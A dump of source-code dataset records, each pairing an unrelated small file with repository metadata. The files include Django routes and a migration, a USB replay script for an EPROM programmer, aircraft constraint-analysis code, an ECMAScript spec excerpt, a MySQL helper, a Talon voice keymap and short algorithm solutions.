"[email protected]"
] | |
0991be737f49582ec10aa7eedbd0a61d6dfe7b40 | 9b0bdebe81e558d3851609687e4ccd70ad026c7f | /剑指offer/02.从尾到头打印链表.py | c171768fb4cf4ebffccff7c7bf930ebb8b0066c0 | [] | no_license | lizenghui1121/DS_algorithms | 645cdad007ccbbfa82cc5ca9e3fc7f543644ab21 | 9690efcfe70663670691de02962fb534161bfc8d | refs/heads/master | 2022-12-13T22:45:23.108838 | 2020-09-07T13:40:17 | 2020-09-07T13:40:17 | 275,062,257 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 509 | py | """
输入一个链表,按链表从尾到头的顺序返回一个ArrayList。
@Author: Li Zenghui
@Date: 2020-03-02 20:10
"""
# -*- coding:utf-8 -*-
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
# 返回从尾部到头部的列表值序列,例如[1,2,3]
def printListFromTailToHead(self, listNode):
res = []
p = listNode
while p:
res.insert(0, p.val)
p = p.next
return res | [
"[email protected]"
] | |
b08c2c670bcb0c5c3ca004b5b5e8ae7656f10ffa | 369b985626c565096a3e65635542ac708339b329 | /blog/urls.py | 9a3cbcfd3770f5beceeffc016a5790b887880504 | [
"MIT"
] | permissive | ernestmucheru/Week4-IP | 9a68b28a127d8746d777d7b67e2cc055d034980c | be80372a33cbc3e80644915db66e0bf51cced175 | refs/heads/main | 2023-06-27T19:45:48.071039 | 2021-07-27T06:34:22 | 2021-07-27T06:34:22 | 389,307,262 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | from django.urls import path
# from .views import (PostListView,PostDetailView,PostCreateView,PostUpdateView,PostDeleteView)
from . import views
urlpatterns =[
# path('', PostListView.as_view(), name='blog'),
# path('post/<int:pk>/', PostDetailView.as_view(), name='post-detail'),
# path('post/new/', PostCreateView.as_view(), name='post-create'),
# path('post/<int:pk>/update/', PostUpdateView.as_view(), name='post-update'),
# path('post/<int:pk>/delete/', PostDeleteView.as_view(), name='post-delete'),
path('new-post', views.create_post, name='post'),
path('<hood_id>/new-post', views.create_post, name='post')
] | [
"[email protected]"
] | |
84df37df94ef3c4a86e883fc459662587a40e5c2 | 10686640b326da3de4e37b08bebd9f7ec7609ca7 | /uvscada/bpm/i87c51/write.py | 05a1a477faa0b38d6118941655ab56c87cb0f289 | [
"BSD-2-Clause"
] | permissive | jshafer817/uvscada | 62e11d136e03968878bcd647c896c32acae23c79 | 206a6c0cbf241b037de1fab47ce6f386d61b7982 | refs/heads/master | 2021-01-18T05:00:32.710552 | 2017-02-26T03:06:34 | 2017-02-26T03:06:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,066 | py | import binascii
import time
import usb1
import libusb1
import sys
import struct
import inspect
from uvscada.usb import usb_wraps
from uvscada.bpm.bp1410_fw import load_fx2
from uvscada.bpm import bp1410_fw_sn, startup
from uvscada.bpm.cmd import bulk2, bulk86
from uvscada.bpm.cmd import sm_read, gpio_readi, led_mask_30, cmd_49, cmd_02, cmd_50, cmd_57s, cmd_57_94, cmd_57_50
from uvscada.bpm.cmd import sm_info0, sm_info1, sm_insert, sn_read, sm_info22, sm_info24, sm_info10
from uvscada.util import str2hex, hexdump
from uvscada.usb import validate_read, validate_readv
import read
import read_fw
import write_fw
class NotBlank(Exception):
pass
def open_dev(usbcontext=None):
if usbcontext is None:
usbcontext = usb1.USBContext()
print 'Scanning for devices...'
for udev in usbcontext.getDeviceList(skip_on_error=True):
vid = udev.getVendorID()
pid = udev.getProductID()
if (vid, pid) == (0x14b9, 0x0001):
print
print
print 'Found device'
print 'Bus %03i Device %03i: ID %04x:%04x' % (
udev.getBusNumber(),
udev.getDeviceAddress(),
vid,
pid)
return udev.open()
raise Exception("Failed to find a device")
# sm scan for large values
# Exception: prefix: wanted 0x08, got 0x2C
'''
TODO: handle better
If you try to program something you can't
(ie a non-erased part)
you'll get
BadPrefix: Wanted prefix 0x18, got 0x08
with reply \x63\x01
'''
def fw_w(dev, fw, verbose=False):
pos = 0
print 'FW load: begin'
tstart = time.time()
while pos < len(fw):
remain = len(fw) - pos
chunk = fw[pos:pos + min(remain, 0xCC)]
if len(chunk) == remain:
prefix = 0x08
reply = "\x00"
else:
prefix = 0x18
reply = "\x0B"
if verbose:
print ' pos 0X%04X, len 0x%02X, prefix 0x%02X' % (pos, len(chunk), prefix)
buff = bulk2(dev,
chr(len(chunk)) + '\x00' + chunk,
target=0x01, prefix=prefix)
validate_read(reply, buff, "packet W: 429/430, R: 431/432")
pos += len(chunk)
tend = time.time()
print 'FW load : end. Took %0.1f sec' % (tend - tstart,)
'''
First one is a program cycle, others are simply
FW load: begin
FW load : end. Took 2.7 sec
FW load: begin
FW load : end. Took 0.1 sec
FW load: begin
FW load : end. Took 0.1 sec
'''
def replay(dev, fw, cont=True, blank=True):
bulkRead, bulkWrite, controlRead, controlWrite = usb_wraps(dev)
# Generated by uvusbreplay 0.1
# uvusbreplay copyright 2011 John McMaster <[email protected]>
# cmd: /home/mcmaster/bin/usbrply --packet-numbers --no-setup --comment --fx2 --packet-numbers -j cap/2015-10-11/i87c51_13_write_cont_id_blank_v2_ff.cap
# FIXME: size?
read.replay1(dev, cont)
# Generated from packet 363/364
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 367/368
cmd_50(dev, "\x18\x00")
# Generated from packet 369/370
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x8F\x00", buff, "packet W: 369/370, R: 371/372")
# Generated from packet 373/374
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x90\x00\xB0\x5D\x09\x00", buff, "packet W: 373/374, R: 375/376")
# Generated from packet 377/378
buff = bulk2(dev, "\x57\x8F\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 377/378, R: 379/380")
# Generated from packet 381/382
cmd_50(dev, "\x0A\x06")
# Generated from packet 383/384
buff = bulk2(dev, write_fw.p383, target=0x02)
validate_read("\x90\x00", buff, "packet W: 383/384, R: 385/386")
# Generated from packet 387/388
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x91\x00\xC0\x63\x09\x00", buff, "packet W: 387/388, R: 389/390")
# Generated from packet 391/392
if blank:
print 'Blank checking'
tstart = time.time()
buff = bulk2(dev, "\x08\x00\x57\x90\x00", target=0x02)
tend = time.time()
print 'Blank test took %0.3f sec' % (tend - tstart,)
if buff == "\x00\x00":
print 'Blank: pass'
elif buff == "\x01\x00":
raise NotBlank('Blank: fail')
else:
hexdump(buff)
raise Exception("Unknown blank status")
# Generated from packet 395/396
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 399/400
cmd_50(dev, "\x18\x00")
# Generated from packet 401/402
buff = bulk2(dev,
"\x66\xB8\x01\x32\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x91\x00", buff, "packet W: 401/402, R: 403/404")
# Generated from packet 405/406
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x92\x00\xE0\x63\x09\x00", buff, "packet W: 405/406, R: 407/408")
# Generated from packet 409/410
buff = bulk2(dev, "\x57\x91\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 409/410, R: 411/412")
# Generated from packet 413/414
cmd_50(dev, "\x9F\x09")
# Generated from packet 415/416
buff = bulk2(dev, write_fw.p415, target=0x02)
validate_read("\x92\x00", buff, "packet W: 415/416, R: 417/418")
# Generated from packet 419/420
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x93\x00\x80\x6D\x09\x00", buff, "packet W: 419/420, R: 421/422")
# Generated from packet 423/424
buff = bulk2(dev, "\x57\x92\x00", target=0x01)
validate_read("\x62", buff, "packet W: 423/424, R: 425/426")
# Generated from packet 427/428
# NOTE: prefix 0x18
buff = bulk86(dev, target=0x01, prefix=0x18)
validate_read("\x0B", buff, "packet 427/428")
# Generated from packet 429/430
fw_w(dev, fw, verbose=True)
# Generated from packet 513/514
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 517/518
cmd_50(dev, "\x18\x00")
# Generated from packet 519/520
buff = bulk2(dev,
"\x66\xB8\x01\x2D\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x93\x00", buff, "packet W: 519/520, R: 521/522")
# Generated from packet 523/524
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x94\x00\xA0\x6D\x09\x00", buff, "packet W: 523/524, R: 525/526")
# Generated from packet 527/528
buff = bulk2(dev, "\x57\x93\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 527/528, R: 529/530")
# Generated from packet 531/532
cmd_50(dev, "\xE0\x08")
# Generated from packet 533/534
buff = bulk2(dev, write_fw.p533, target=0x02)
validate_read("\x94\x00", buff, "packet W: 533/534, R: 535/536")
# Generated from packet 537/538
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x95\x00\x80\x76\x09\x00", buff, "packet W: 537/538, R: 539/540")
# Generated from packet 541/542
cmd_57_94(dev)
# Generated from packet 547/548
fw_w(dev, fw)
# Generated from packet 631/632
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 635/636
cmd_50(dev, "\x18\x00")
# Generated from packet 637/638
buff = bulk2(dev,
"\x66\xB8\x01\x37\x66\x89\x05\x06\x00\x09\x00\x66\xB9\x00\x00\xB2" \
"\x00\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x95\x00", buff, "packet W: 637/638, R: 639/640")
# Generated from packet 641/642
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x96\x00\xA0\x76\x09\x00", buff, "packet W: 641/642, R: 643/644")
# Generated from packet 645/646
buff = bulk2(dev, "\x57\x95\x00\x57\x89\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 645/646, R: 647/648")
# Generated from packet 649/650
cmd_57_94(dev)
# Generated from packet 655/656
fw_w(dev, fw)
# Generated from packet 739/740
cmd_57s(dev, '\x8C', "\x00\x00")
# Generated from packet 743/744
cmd_50(dev, "\x0D\x00")
# Generated from packet 745/746
buff = bulk2(dev, "\x66\xB9\x00\x00\xB2\x00\xFB\xFF\x25\x44\x11\x00\x00", target=0x02)
validate_read("\x96\x00", buff, "packet W: 745/746, R: 747/748")
# Generated from packet 749/750
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x97\x00\xB0\x76\x09\x00", buff, "packet W: 749/750, R: 751/752")
# Generated from packet 753/754
cmd_57_50(dev, "\x96", "\x1A\x00")
# Generated from packet 755/756
buff = bulk2(dev,
"\x66\xB9\x00\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00\x66\xB9\x00" \
"\x00\xB2\x02\xFB\xFF\x25\x44\x11\x00\x00"
, target=0x02)
validate_read("\x97\x00", buff, "packet W: 755/756, R: 757/758")
# Generated from packet 759/760
buff = bulk2(dev, "\x02", target=0x06)
validate_read("\x98\x00\xD0\x76\x09\x00", buff, "packet W: 759/760, R: 761/762")
# Generated from packet 763/764
buff = bulk2(dev, "\x57\x97\x00", target=0x02)
validate_read("\x00\x00", buff, "packet W: 763/764, R: 765/766")
# Generated from packet 767/768
led_mask_30(dev, "pass")
# Generated from packet 771/772
gpio_readi(dev)
# Generated from packet 775/776
gpio_readi(dev)
# Generated from packet 779/780
sm_info22(dev)
# Generated from packet 783/784
sm_info24(dev)
# Generated from packet 787/788
sm_read(dev)
# Generated from packet 791/792
cmd_49(dev)
# Generated from packet 795/796
sm_read(dev)
# Generated from packet 799/800
sm_insert(dev)
# Generated from packet 803/804
sm_info10(dev)
| [
"[email protected]"
] | |
dcd1312cab4fb26d9d18de7f6ae7ba98ab807bcc | 00c6ded41b84008489a126a36657a8dc773626a5 | /.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712184959.py | 2722f9846c7b00deb679ab94edd3570b6ebdba30 | [] | no_license | 12libao/DEA | 85f5f4274edf72c7f030a356bae9c499e3afc2ed | 1c6f8109bbc18c4451a50eacad9b4dedd29682bd | refs/heads/master | 2023-06-17T02:10:40.184423 | 2021-07-16T19:05:18 | 2021-07-16T19:05:18 | 346,111,158 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,129 | py | # author: Bao Li #
# Georgia Institute of Technology #
import sys
import os
sys.path.insert(0, os.getcwd())
import numpy as np
import matplotlib.pylab as plt
import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm
import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse
import Sizing_Method.Aerodynamics.Aerodynamics as ad
import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca
from scipy.optimize import curve_fit
"""
The unit use is IS standard
"""
class ConstrainsAnalysis_Mattingly_Method_with_DP:
"""This is a power-based master constraints analysis"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0):
"""
:param beta: weight fraction
:param Hp: P_motor/P_total
:param n: number of motor
:param K1: drag polar coefficient for 2nd order term
:param K2: drag polar coefficient for 1st order term
:param C_D0: the drag coefficient at zero lift
:param C_DR: additional drag caused, for example, by external stores,
braking parachutes or flaps, or temporary external hardware
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
self.beta = beta
self.hp = Hp
self.n = number_of_motor
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1()
self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2()
self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0()
self.cdr = C_DR
self.w_s = wing_load
self.g0 = 9.80665
self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
self.cl = self.beta * self.w_s / self.q
# print(self.cl)
self.delta_cl = pd.delta_lift_coefficient(self.cl)
self.delta_cd0 = pd.delta_CD_0()
def master_equation(self, n, dh_dt, dV_dt):
cl = self.cl * n + self.delta_cl
cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0
p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0)
return p_w
def cruise(self):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0)
return p_w
def climb(self, roc):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 300 knots, which is about 150 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0)
return p_w
def take_off(self):
"""
A320neo take-off speed is about 150 knots, which is about 75 m/s
required runway length is about 2000 m
K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations)
"""
Cl_max_to = 2.3 # 2.3
K_TO = 1.2 # V_TO / V_stall
s_G = 1266
p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / (
s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** (
3 / 2)
return p_w
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
def service_ceiling(self, roc=0.5):
p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0)
return p_w
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
class ConstrainsAnalysis_Gudmundsson_Method_with_DP:
"""This is a power-based master constraints analysis based on Gudmundsson_method"""
def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3):
"""
:param tau: power fraction of i_th power path
:param beta: weight fraction
:param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1
:param AR: wing aspect ratio, normally between 7 and 10
:return:
power load: P_WTO
"""
self.h = altitude
self.v = velocity
self.beta = beta
self.w_s = wing_load
self.g0 = 9.80665
self.beta = beta
self.hp = Hp
self.n = number_of_motor
self.rho = atm.atmosphere(geometric_altitude=self.h).density()
# power lapse ratio
self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h,
velocity=self.v).high_bypass_ratio_turbofan()
h = 2.43 # height of winglets
b = 35.8
ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected
self.k = 1 / (np.pi * ar_corr * e)
self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha
# Estimation of ΔCL and ΔCD
pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s)
self.q = 0.5 * self.rho * self.v ** 2
cl = self.beta * self.w_s / self.q
self.delta_cl = pd.delta_lift_coefficient(cl)
self.delta_cd0 = pd.delta_CD_0()
# TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft
cd_min = 0.02
cd_to = 0.03
cl_to = 0.8
self.v_to = 68
self.s_g = 1480
self.mu = 0.04
self.cd_min = cd_min + self.delta_cd0
self.cl = cl + self.delta_cl
self.cd_to = cd_to + self.delta_cd0
self.cl_to = cl_to + self.delta_cl
def cruise(self):
p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2)
return p_w * self.coefficient
def climb(self, roc):
p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl
return p_w * self.coefficient
def level_turn(self, turn_rate=3, v=100):
"""
assume 2 min for 360 degree turn, which is 3 degree/seconds
assume turn at 100 m/s
"""
load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5
q = 0.5 * self.rho * v ** 2
p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2)
return p_w * self.coefficient
def take_off(self):
q = self.q / 2
p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * (
1 - q * self.cl_to / self.w_s)
return p_w * self.coefficient
def service_ceiling(self, roc=0.5):
vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5
q = 0.5 * self.rho * vy ** 2
p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2)
# p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * (
# self.k * self.cd_min / 3) ** 0.5
return p_w * self.coefficient
def stall_speed(self, V_stall_to=65, Cl_max_to=2.3):
V_stall_ld = 62
Cl_max_ld = 2.87
W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl)
W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl)
W_S = min(W_S_1, W_S_2)
return W_S
allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb]
if __name__ == "__main__":
n = 100
w_s = np.linspace(100, 9000, n)
constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m',
'climb @S-L', 'climb @3000m', 'climb @7000m']
constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948],
[11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984],
[3000, 200, 0.975], [7000, 230, 0.96]])
color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm']
label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson',
'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly']
m = constrains.shape[0]
p_w = np.zeros([2 * m, n])
for k in range(3):
plt.figure(figsize=(12, 8))
for i in range(m):
for j in range(n):
h = constrains[i, 0]
v = constrains[i, 1]
beta = constrains[i, 2]
if k == 0:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level')
elif k == 1:
problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level')
else:
problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j])
problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j])
plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level')
if i >= 5:
p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5))
p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5))
else:
p_w[i, j] = problem1.allFuncs[i](problem1)
p_w[i + m, j] = problem2.allFuncs[i](problem2)
if i == 1:
l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i])
l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--')
if k != 2:
l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right")
else:
l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right")
else:
plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i])
plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--')
def func(x, a0, a1, a2, a3, a4, a5, a6):
return a0 + a1*x + a2*x**2 + a3*x**3 + a4* a4*np.sin(x) + a5*np.cos(x)
#return a * np.exp(b * x) + c
if i == 1:
xdata, ydata = p_w[i, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4], popt[5])
if k != 2:
p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2])
else:
def func(x, a, b, c, d, e):
return a + b*x + c*x**2 + d*x**3 + e*x**4
#return a * np.exp(b * x) + c
xdata, ydata = p_w[m+1, :], np.linspace(0, 250, n)
popt, _ = curve_fit(func, xdata, ydata)
p_w[m+1, :] = func(w_s, popt[0], popt[1],
popt[2], popt[3], popt[4])
plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25,
label=label[k])
plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25,
label=label[k + 3])
plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)')
plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)')
plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left")
plt.gca().add_artist(l1)
plt.xlim(100, 9000)
plt.ylim(0, 200)
plt.tight_layout()
plt.grid()
plt.show()
| [
"[email protected]"
] | |
2f9e3f9b1f607d3f89fc3e056f19fcccad2f74fe | 28a462a28f443c285ca5efec181ebe36b147c167 | /tests/compile/basic/recent/String.prototype.startsWith.spec | ba62e090c26d2ee9be97ca1a97a2010796ad2856 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | kaist-plrg/jstar | 63e71f9156860dc21cccc33a9f6c638dfee448ea | 1282919127ea18a7e40c7a55e63a1ddaaf7d9db4 | refs/heads/main | 2022-07-22T08:12:34.947712 | 2022-02-27T04:19:33 | 2022-02-27T11:06:14 | 384,045,526 | 6 | 4 | NOASSERTION | 2022-02-27T11:05:26 | 2021-07-08T07:53:21 | Python | UTF-8 | Python | false | false | 884 | spec | 1. Let _O_ be ? RequireObjectCoercible(*this* value).
1. Let _S_ be ? ToString(_O_).
1. Let _isRegExp_ be ? IsRegExp(_searchString_).
1. If _isRegExp_ is *true*, throw a *TypeError* exception.
1. Let _searchStr_ be ? ToString(_searchString_).
1. Let _len_ be the length of _S_.
1. If _position_ is *undefined*, let _pos_ be 0; else let _pos_ be ? ToIntegerOrInfinity(_position_).
1. Let _start_ be the result of clamping _pos_ between 0 and _len_.
1. Let _searchLength_ be the length of _searchStr_.
1. If _searchLength_ = 0, return *true*.
1. Let _end_ be _start_ + _searchLength_.
1. If _end_ > _len_, return *false*.
1. Let _substring_ be the substring of _S_ from _start_ to _end_.
1. Return ! SameValueNonNumeric(_substring_, _searchStr_). | [
"[email protected]"
] | |
9d0b0a941398fd991247b3a0ec96412244d364c5 | 30fe7671b60825a909428a30e3793bdf16eaaf29 | /.metadata/.plugins/org.eclipse.core.resources/.history/9a/f0d15008ccf800161174a93fd5908e78 | 96f863b8b89de32901e8cf640c731bc4ebefeb38 | [] | no_license | abigdream84/PythonStudy | 0fc7a3b6b4a03a293b850d0ed12d5472483c4fb1 | 059274d3ba6f34b62ff111cda3fb263bd6ca8bcb | refs/heads/master | 2021-01-13T04:42:04.306730 | 2017-03-03T14:54:16 | 2017-03-03T14:54:16 | 79,123,274 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 983 | #!/usr/bin/env python
#coding:UTF-8
from audit_demo.utility.MySqlHelper import MySqlHelper
class g_table(object):
def __init__(self):
self.__helper = MySqlHelper()
def add_grp(self,gpname):
sql = 'insert into g_table(g_name) values(%s)'
try:
self.__helper.insert(sql,gpname)
return True
except Exception as e:
print(e)
return False
def get_grp(self,gpname):
sql = 'select g_name from g_table where g_name = %s'
try:
g_id = self.__helper.select(sql,gpname)
except Exception as e:
print(e)
return g_id
def upd_grp(self,g_name_old,g_name_new):
sql = 'update g_table set g_name = %s where g_name = %s'
params = (g_name_new, g_name_old)
try:
self.__helper.update(sql,params)
except Exception as e:
print(e)
t=g_table()
t.add_grp('gp1')
| [
"[email protected]"
] | ||
d78e9b91414cf74ab0da36fd5f6de8f911a9e0cd | 53eee7eb899cb518983008532257037fb89def13 | /2579.count-total-number-of-colored-cells.py | eb2d7d5de90aeac6f2c95bbec4eef4b247461260 | [] | no_license | chenxu0602/LeetCode | 0deb3041a66cb15e12ed4585bbe0fefce5dc6b26 | 3dc5af2bc870fcc8f2142130fcd2b7cab8733151 | refs/heads/master | 2023-07-05T19:26:21.608123 | 2023-07-02T08:35:35 | 2023-07-02T08:35:35 | 233,351,978 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | #
# @lc app=leetcode id=2579 lang=python3
#
# [2579] Count Total Number of Colored Cells
#
# @lc code=start
class Solution:
def coloredCells(self, n: int) -> int:
# return n * n + (n - 1) * (n - 1)
return 2 * n * (n - 1) + 1
# @lc code=end
| [
"[email protected]"
] | |
3c74be0064501659bed8cf392ce9d5f5ca0414a4 | bede337b5ee193bb5669c855b70a78d929dc5ae8 | /apps/one_password.py | ca9110f9a15ed7b774c7eb7f446788b5cfa0d019 | [
"0BSD"
] | permissive | dwiel/talon-user | ffe83c05e054626431fe12c14dbfe850950fa4c4 | 559617135408ea2ceafaef54564438405546f255 | refs/heads/master | 2020-09-12T22:58:36.575833 | 2019-11-19T17:12:05 | 2019-11-19T17:12:05 | 222,585,938 | 0 | 0 | NOASSERTION | 2019-11-19T02:00:20 | 2019-11-19T02:00:19 | null | UTF-8 | Python | false | false | 217 | py | from talon import ctrl
from talon.voice import Context, Key
from ..utils import text, delay
ctx = Context("1password")
ctx.keymap({
"password [<dgndictation>] [over]": [Key("shift-cmd-\\"), delay(0.2), text],
}) | [
"[email protected]"
] | |
050f2631f6b47527fb3ebdc876e7b392d2199011 | 3ffb51fa2241cba9c9680ab01f8da4057861f849 | /collezione/migrations/0023_auto_20181102_1526.py | a6e5117963a13b170e60c828a4b8d205856cf3f5 | [] | no_license | mions1/Euros | a663d9e3a38de56c51091233e6b4fc6db3147fb2 | faa74139e178b2c9dc868a536518715bed91c676 | refs/heads/master | 2020-04-08T00:12:45.713416 | 2018-11-23T14:35:45 | 2018-11-23T14:35:45 | 158,842,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 755 | py | # Generated by Django 2.1.2 on 2018-11-02 15:26
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('collezione', '0022_auto_20181030_2030'),
]
operations = [
migrations.AddField(
model_name='acquisto',
name='prezzo',
field=models.FloatField(default=0.0),
),
migrations.AlterField(
model_name='acquisto',
name='data',
field=models.DateField(default=django.utils.timezone.now),
),
migrations.AlterField(
model_name='possiede',
name='prezzo',
field=models.FloatField(default=0.0, null=True),
),
]
| [
"[email protected]"
] | |
